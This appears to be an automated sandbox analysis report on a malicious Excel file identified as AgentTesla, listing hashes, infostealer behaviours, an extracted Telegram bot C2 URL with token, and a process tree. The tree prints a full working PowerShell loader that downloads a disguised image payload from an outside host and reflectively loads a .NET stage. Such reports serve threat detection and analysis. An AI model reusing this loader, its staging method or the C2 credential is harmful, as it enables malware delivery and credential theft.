Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/04/2024, 05:49

General

  • Target

    gmb.xls

  • Size

    317KB

  • MD5

    37d7ed40a42e26fbc230b8ba27f5e7a7

  • SHA1

    e1bbcb647ab9a9997d5efcc1c9dccb0d6ae44fd2

  • SHA256

    65fad97c98ab775a18d96e3ddbfd291500d23f856bde32bdab3fb2417560dacc

  • SHA512

    3be9673b330b95c7c52d1328f50443821852f8e0471014338b066bbbedef302da7eaa7601d09ef507dd7e9d67ef7d8fd166f4e0c40b0f93942e46328237acfc3

  • SSDEEP

    6144:EVunJE2uY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVYjMIrSdsLks3Azpt6Tf:E4JE2n3bVYjMIrSkkt86KWriT

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6957776389:AAGE3Y2I0YZ27F-41ZLwjxi6zM96chGzSyw/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request (6 IoCs)
  • Abuses OpenXML format to download file from external location
  • Drops startup file (2 IoCs)
  • Reads WinSCP keys stored on the system (2 TTPs)

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients (2 TTPs)

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients (2 TTPs)

    Email clients store some user data on disk, and infostealers often target it.

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials.

  • Looks up external IP address via web service (2 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory (1 IoC)
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry (2 TTPs, 1 IoC)
  • Launches Equation Editor (1 TTP, 1 IoC)

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings (1 TTP, 31 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (5 IoCs)
  • Suspicious use of WriteProcessMemory (24 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\gmb.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2292
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:540
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IBnetworkPDFlovedone.js"
        2⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BMG/bmg/ppmax/212.84.631.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1496
          • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1444

